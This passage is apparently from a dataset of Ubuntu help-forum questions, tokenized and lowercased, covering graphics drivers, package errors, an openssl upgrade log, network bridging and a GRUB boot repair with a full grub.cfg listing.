libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup logged out and logged in under unity now getting glxinfo name of display : :0 display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 and /usr/lib/nux/unity_support_test -p opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd rs780 opengl version string : 2.1 mesa 8.0.4 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
458779	error jack headers not found	hello what command i need to fill and enter to fix this configure error : running 14.04 latest version of ubuntu configure : error : jack headers not found .
458781	what is the difference between `groups $ user`and `groups` in a terminal ?	when i run the the following command in a terminal i get different output . i try to find out if i am a member of the wireshark group . groups $ user does list wireshark groups does not list wireshark so do i belong to the wireshark group or not ?
458789	text files open in nautilus instead of text editor	when i try to open a `` plain text document '' ( no file extension ) it opens its folder in the file manager ( nautilus ) , instead of opening the file in my text editor . this happens when i open it through chromium , or through the dash , or through the command line using xdg-open . i have set `` geany '' as the default application to open `` plain text document '' with . but this only works if i open the file from within nautilus .
458790	why is my launcher automatically set to default and personal keyboard layouts disappeared ?	yesterday , i was using a program to read something into the ram , but underestimated the size . my computer started swapping and lost itself in its calculation , hence i killed the process ( and firefox etc ) . but it was really slow afterwards , so i logged out and in , and it was n't better , so i restarted . then there were a dozen errors like '' sorry , the program `` rsession '' closed unexpectedly . your computer does not have enough free memory to automatically analyze the problem and send a report to the developers . '' and '' sorry , ubuntu 12.04 experienced an internal error '' ; show details just brought another such message , and when i clicked on continue '' the application report a problem ... . has closed unexpectedly '' problem : now the launcher is set to default icons ( my icons are gone ) , as well as my personal keyboard layouts , yet all my data is there . any clue what happened or how i can retrieve it ? i 'm using ubuntu 12.04 with a connection to a server . thanks ! p.s . : i am sure the answer is already somewhere here , but i did not find the right question to find it . any hint what i am looking for would be appreciated as well ! update : i realized that there are some files ( which i created with pdftk ) which appear in the terminal if i do ls but not if i open the directory in a window . it gets stranger ...
458792	regarding vps on ubuntu	how can i create a vps on ubuntu ? i want to create a vps on ubuntu but can not understand so please give me suggestion and tell me that can i create it by any software if yes then tell me software name .
458794	how to have a process automatically restart	i have a simple home automation program written in python that reads events from usb and sends commands to a server . it runs on a headless ubuntu server . basically , the program does a while true loop . now if this program should be interrupted for whatever reason , i want it to automatically restart . a few moments or even minutes of down time would not be a problem . what is the easiest way to do this ? i could write a cron job to check whether the program is still there , but is there another way to do this that i might not know about ?
458798	how to make a .desktop file that matches all files and dirs ?	i have a script that i want to be available for the `` open with ... '' context menu for nautilus ( or less helpfully , `` files '' ) running in gnome shell . i 've created a .desktop file and registered it with the mime type inode/directory , which works find for all dirs , but i ca n't find how to also make it work for all files . the spec offers no help here . i do n't want to list every conceivable mime time because someone will only go and conceive of a new one ; - ) i 've tried inode/all and inode/* to no avail . aside : why ? it 's a helper for a heterogeneous network . this script takes the filepath and , if it can be recognised as a path on one of our servers , it creates a windows smb filepath and puts it on the clipboard . this enables users to email eachother filepaths that are openable on windows . when other ubuntu users receive these filepaths i use another script to turn them back into suitable filepaths and open that up in nautilus/nemo/thunar/ ... so ubuntu users can right-click any file , and choose `` copy windows filepath '' which will run this script . this is why it needs to be available for any mime type .
458801	installing a 3.5g usb modem	i plug the usb modem and run this command : sudo fdisk -l then i got this line that indicate the usb modem bus 001 device 023 : id 1c9e:6061 omega technology wl-72b 3.5g modem can you tell me how to configure it ?
458802	black screen on boot after upgrade to 14.04	i was encouraged to update to 14.04 by ubuntu , i have done so and when i try to boot up all i get is a blank black screen . if this can not be resolved can you please send me details how to remove ubuntu completely as i am very disappointed with what has happened . luckily i still have windows on my pc and i can contact you
458804	how do i change the default file manager for opening downloads in skype ?	in skype on ubuntu , you can click a little folder icon next to a download to open the directory containing the download : when i click the folder icon , the folder is always opened in nautilus ? how do i change the file manager used to open this file ?
458806	problems upgrading openssl to fix heartbleed - please advise	i 'm trying to upgrade openssl but hit the following issue - please could you offer some advice on what is wrong here ? # sudo apt-get install openssl libssl1.0.0 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . linux-image-server : depends : linux-image-3.2.0-53-generic but it is not going to be installed e : unmet dependencies . try `sudo apt-get -f install` with no packages ( or specify a solution ) . i 've not tried tried the apt-get -f install option yet i followed up as per smurfs suggestion but only got the following : - # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-39-generic linux-headers-3.2.0-33 linux-headers-3.2.0-40 linux-headers-3.2.0-37 linux-headers-3.2.0-38 linux-headers-3.2.0-39 linux-headers-3.2.0-45 linux-image-3.2.0-45-generic linux-headers-3.2.0-37-generic linux-image-3.2.0-40-generic linux-headers-3.2.0-45-generic linux-image-3.2.0-38-generic linux-headers-3.2.0-40-generic linux-headers-3.2.0-38-generic linux-headers-3.2.0-33-generic linux-image-3.2.0-39-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-server linux-image-3.2.0-61-generic linux-image-server linux-server suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed linux-image-3.2.0-61-generic the following packages will be upgraded : linux-headers-server linux-image-server linux-server 3 upgraded , 1 newly installed , 0 to remove and 180 not upgraded . 38 not fully installed or removed . need to get 0 b/38.8 mb of archives . after this operation , 150 mb of additional disk space will be used . do you want to continue [ y/n ] ? y setting up base-files ( 6.5ubuntu6.7 ) ... installing new version of config file /etc/issue ... installing new version of config file /etc/issue.net ... installing new version of config file /etc/lsb-release ... e : error : brokencount > 0run-parts : /etc/update-motd.d/90-updates-available exited with return code 255 processing triggers for plymouth-theme-ubuntu-text ... update-initramfs : deferring update ( trigger activated ) ( reading database ... 343095 files and directories currently installed . ) unpacking linux-image-3.2.0-61-generic ( from ... /linux-image-3.2.0-61-generic_3.2.0-61.92_amd64.deb ) ... done . setting up libdrm2 ( 2.4.46-1ubuntu0.0.0.1 ) ... setting up libpciaccess0 ( 0.12.902-1ubuntu0.2 ) ... setting up libdrm-intel1 ( 2.4.46-1ubuntu0.0.0.1 ) ... setting up libdrm-nouveau1a ( 2.4.46-1ubuntu0.0.0.1 ) ... setting up libdrm-radeon1 ( 2.4.46-1ubuntu0.0.0.1 ) ... setting up libglib2.0-0 ( 2.32.4-0ubuntu1 ) ... no schema files found : doing nothing . setting up libnih1 ( 1.0.3-4ubuntu9.1 ) ... setting up libnih-dbus1 ( 1.0.3-4ubuntu9.1 ) ... setting up libudev0 ( 175-0ubuntu9.5 ) ... setting up libplymouth2 ( 0.8.2-2ubuntu31.1 ) ... setting up initramfs-tools-bin ( 0.99ubuntu13.5 ) ... setting up busybox-initramfs ( 1:1.18.5-1ubuntu4.1 ) ... setting up iproute ( 20111117-1ubuntu2.1 ) ... setting up libc-dev-bin ( 2.15-0ubuntu10.5 ) ... setting up linux-libc-dev ( 3.2.0-53.81 ) ... setting up libc6-dev ( 2.15-0ubuntu10.5 ) ... setting up libc6-i386 ( 2.15-0ubuntu10.5 ) ... setting up linux-firmware ( 1.79.12 ) ... setting up linux-headers-3.2.0-53 ( 3.2.0-53.81 ) ... setting up linux-headers-3.2.0-53-generic ( 3.2.0-53.81 ) ... setting up linux-headers-3.2.0-60 ( 3.2.0-60.91 ) ... setting up linux-headers-3.2.0-60-generic ( 3.2.0-60.91 ) ... setting up linux-headers-3.2.0-61 ( 3.2.0-61.92 ) ... setting up linux-headers-3.2.0-61-generic ( 3.2.0-61.92 ) ... dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-53-generic ; however : package linux-image-3.2.0-53-generic is not installed . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . setting up linux-headers-server ( 3.2.0.53.63 ) ... dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.53.63 ) ; however : package linux-image-server is not configured yet . dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . setting up tzdata-java ( 2014a-0ubuntu0.12.04 ) ... setting up libdevmapper1.02.1 ( 2:1.02.48-4ubuntu7.4 ) ... setting up ifupdown ( 0.7~beta2ubuntu11 ) ... setting up initramfs-tools ( 0.99ubuntu13.5 ) ... update-initramfs : deferring update ( trigger activated ) setting up upstart ( 1.5-0ubuntu7.2 ) ... setting up linux-image-3.2.0-61-generic ( 3.2.0-61.92 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-61-generic /boot/vmlinuz-3.2.0-61-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-61-generic /boot/vmlinuz-3.2.0-61-generic update-initramfs : generating /boot/initrd.img-3.2.0-61-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-61-generic /boot/vmlinuz-3.2.0-61-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-61-generic /boot/vmlinuz-3.2.0-61-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-61-generic found initrd image : /boot/initrd.img-3.2.0-61-generic found linux image : /boot/vmlinuz-3.2.0-52-generic found initrd image : /boot/initrd.img-3.2.0-52-generic found linux image : /boot/vmlinuz-3.2.0-51-generic found initrd image : /boot/initrd.img-3.2.0-51-generic found linux image : /boot/vmlinuz-3.2.0-48-generic found initrd image : /boot/initrd.img-3.2.0-48-generic found linux image : /boot/vmlinuz-3.2.0-45-generic found initrd image : /boot/initrd.img-3.2.0-45-generic found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found memtest86+ image : /memtest86+.bin done setting up procps ( 1:3.2.8-11ubuntu6.3 ) ... procps stop/waiting setting up udev ( 175-0ubuntu9.5 ) ... udev stop/waiting udev start/running , process 9106 removing 'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev' update-initramfs : deferring update ( trigger activated ) setting up mountall ( 2.36.4 ) ... setting up plymouth ( 0.8.2-2ubuntu31.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up dmsetup ( 2:1.02.48-4ubuntu7.4 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-61-generic errors were encountered while processing : linux-image-server linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any further ideas here ?
458807	getting colored screen with lining after some minutes	hello i am using ubuntu os and i have been installed ubuntu 6 months back but from past 2 month i am getting problem of colored screen , system becomes colored with vertical lines.sometime the system automatically shut down but rarely.note : i have two operating system , firstly i have installed ubuntu then windows.please give any idea .
458808	printer drivers in ubuntu 14.04	i use a hp 2510 printer.i recently recently replaced the ink with hp cartridges , and now the printer ejects the paper but does not print . ( however it does print a test page ) .
458809	can i develop .net applications from virtual box on ubuntu	i have ubuntu installed on my system . now i have a project to do using visual studio in c # . i want to know whether i can install windows inside a virtual box and then install visual studio . will i be able to develop csharp application in a virtual environment ? will the virtual box support the running of visual studio software ? thanks in advance .
458810	nvidia screen tearing problem	recently i freshly installed xubuntu 14.04 on my low-end computer . everything is working fine except that i 'm experiencing screen tearing issues while i 'm scrolling through a webpage . i thought i could live with it but after a while it starts to hurt my eyes . i have installed the nvidia proprietary drivers version 331.38 . i 'm using a dual monitor setup , both are the exact same models . gpu is the asus gt210 1gb . searched on the web a little bit and installed compizconfig but i do not have the option to manual set the refresh rate of my monitors . at this point i 'm desperate and have no clue how to solve this issue , could anyone help out ? thank you very much .
458811	insync uploaded half files	insync synced half random files from my selected files & then give this . any solution so i can continue my sync with gdrive .
458813	how can older executables be run in ubuntu 14.04 ?	i did a fresh install of xubuntu 14.04 . executables like opera mobile emulator no longer work . i have already tried the solutions from : no such file or directory for existing executable 64bit ubuntu 14.04 , running 32bit binaries though the error message is not showing up , opera emulator does not fire up . any help would be great . update : the commands already tried are : dpkg -- add-architecture i386 apt-get install ia32-libs - does n't work , deprecated apt-get install libsdl1.2debian : i386 apt-get install libstdc++6 : i386 libgcc1 : i386 zlib1g : i386 libncurses5 : i386 apt-get install libc6-i386 lib32stdc++6 lib32gcc1 lib32ncurses5 lib32z1
458815	how to upgrade from 12.04.1 lts to 12.04.4 lts from usb ?	i want to upgrade from 12.04.1 lts to 12.04.4 lts and there is no gui . which is the best way to upgrade to ubuntu ?
458818	showing unmanaged in network icon even i have a working internet and local net	i have installed ubuntu 12.04 , i have assigned a manual ip address for my host using bridge , i 'm using kvm so i have to use bridge for assigning same network range for virtual machines , now the issue is with my network icon in status bar shows disconnected always but internet and network were working fine without any issue , while clicking on wired connection its shows as unmanaged , how can i fix this icon even my network was up and working fine . below is my network settings i have manually configured using bridge # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.0.254 network 192.168.0.0 netmask 255.255.255.0 broadcast 192.168.0.255 gateway 192.168.0.1 bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0
458819	can i increase the size of the processor l1 and l2 caches ?	im running an ubuntu server 12.04 and checked my cpu status with lscpu and got result : l1d cache : 32k l1i cache : 32k l2 cache : 6144k how can increase my cache size ?
458821	fuzzy text in console on external monitor	i have my laptop connected to external monitor as primary display . when i drop to virtual console/terminal , the console text on the monitor looks very fuzzy . is there way to fix this ?
458823	`` try ubuntu '' as default startup ?	i installed the 64bit version trusty tahr to an usb stick with lili . everything went fine and so far i am happy with the setup , just i would like to prevent the system to ask for installation after startup . just keep the `` try ubuntu '' option as default . is this possible and how ? thanks a lot .
458825	unity top panel missing application options	after the upgrade from 13.10 to 14.04 , i am missing application specific options ( in firefox 's case : `` file '' , `` edit '' , `` view '' etc ) from the unity top bar and they are displayed within application itself ( like in most windows os ) . i would post images for clarification , but i do not have enough reputation for that unfortunately .
458826	ssh update to 14.04 : the disk drive for / is not ready yet or not present	i am not able to restart my ubuntu server after upgrade from 13 to 14.04 . what can i do to make things work again ? i tried to upgrade my server over ssh to ubuntu 14.04 . when the installation finished i saw the message “system restart required” so i did a “sudo reboot” . i was not able to reconnect via ssh afterwards . well , i am able to access the server , so i had a look there . after the reboot i have one refind and one grub boot loader dialog , where i can choose ubuntu . after doing this i get the message “the disk drive for / is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery.” however , nothing happens , when i press “s” or “m” . i have got a macintosh installation i can access on the machine , but was not able to mount the ubuntu device so far . there are many questions here and on google on this topic , but most of them happen to use pressing `` m '' . this is not possible for me , so therefore my question . when i start ubuntu in grub with advanced options , i can now start ubuntu with the linux 3.11.0-19-generic kernel . however , keyboard does function and therefore i understand now , why `` m '' or `` s '' options above are never activated . while following tendons suggestion , it seems that i made a mistake and that at last the message above is still displayed . here is what i did following this answer : created a knoppix-live usb stick and booted it ( mac users : 'c ' for cd/dvd/usb ) mounted the partition sudo mount /dev/sda3 /mnt/foo bound the directories that grub needs to have access to sudo mount -- bind /dev /mnt/foo/dev sudo mount -- bind /dev/pts /mnt/foo/dev/pts sudo mount -- bind /proc /mnt/foo/proc sudo mount -- bind /sys /mnt/foo/sys set up the chroot environment sudo chroot /mnt/foo created grub 's configuration file : sudo grub-mkconfig -o /boot/grub/grub.cfg i have multiple operating systems installed and tried to make sure that the command above lists all of them ( there were other messages like `` image not found '' ) : generating grub.cfg ... found background image : /usr/share/images/desktop-base/desktop-grub.png found linux image : /boot/vmlinuz-*-amd64 ... done now i installed hopefully to the mbr of my drive with grub-install /dev/sda exited the chroot and unmounted everything . sudo umount /mnt/foo/dev/pts /mnt/foo/dev /mnt/foo/proc /mnt/foo/sys /mnt/foo when i rebooted , refind was not able to start anymore . however , i came into grub again , but it behaved like before ... here is my grub.cfg - sda4 is the partition , where ubuntus / is . when i start knoppix and want to access to the partition i have to mount /dev/sda4 . # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=5 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi linux /boot/vmlinuz-3.13.0-24-generic root=/dev/sda4 ro quit splash processor.max_cstate=2 $ vt_handoff } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=/dev/sda4 ro quit splash processor.max_cstate=2 $ vt_handoff } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=/dev/sda4 ro recovery nomodeset } menuentry 'ubuntu , with linux 3.11.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-advanced-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro quit splash processor.max_cstate=2 $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-recovery-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-18-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-18-generic-advanced-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-18-generic ... ' linux /boot/vmlinuz-3.11.0-18-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro quit splash processor.max_cstate=2 $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-18-generic } menuentry 'ubuntu , with linux 3.11.0-18-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-18-generic-recovery-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-18-generic ... ' linux /boot/vmlinuz-3.11.0-18-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-18-generic } menuentry 'ubuntu , with linux 3.11.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-17-generic-advanced-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-17-generic ... ' linux /boot/vmlinuz-3.11.0-17-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro quit splash processor.max_cstate=2 $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-17-generic } menuentry 'ubuntu , with linux 3.11.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-17-generic-recovery-1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi echo 'loading linux 3.11.0-17-generic ... ' linux /boot/vmlinuz-3.11.0-17-generic root=uuid=1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea else search -- no-floppy -- fs-uuid -- set=root 1b12d4dd-8a3c-47b1-8b9d-7c6cbe5371ea fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'mac os x ( 32-bit ) ( on /dev/sda2 ) ' -- class osx -- class darwin -- class os $ menuentry_id_option 'osprober-xnu-32-8a6a66edd559aa12 ' { insmod part_gpt insmod hfsplus set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 8a6a66edd559aa12 else search -- no-floppy -- fs-uuid -- set=root 8a6a66edd559aa12 fi load_video set do_resume=0 if [ /var/vm/sleepimage -nt10 / ] ; then if 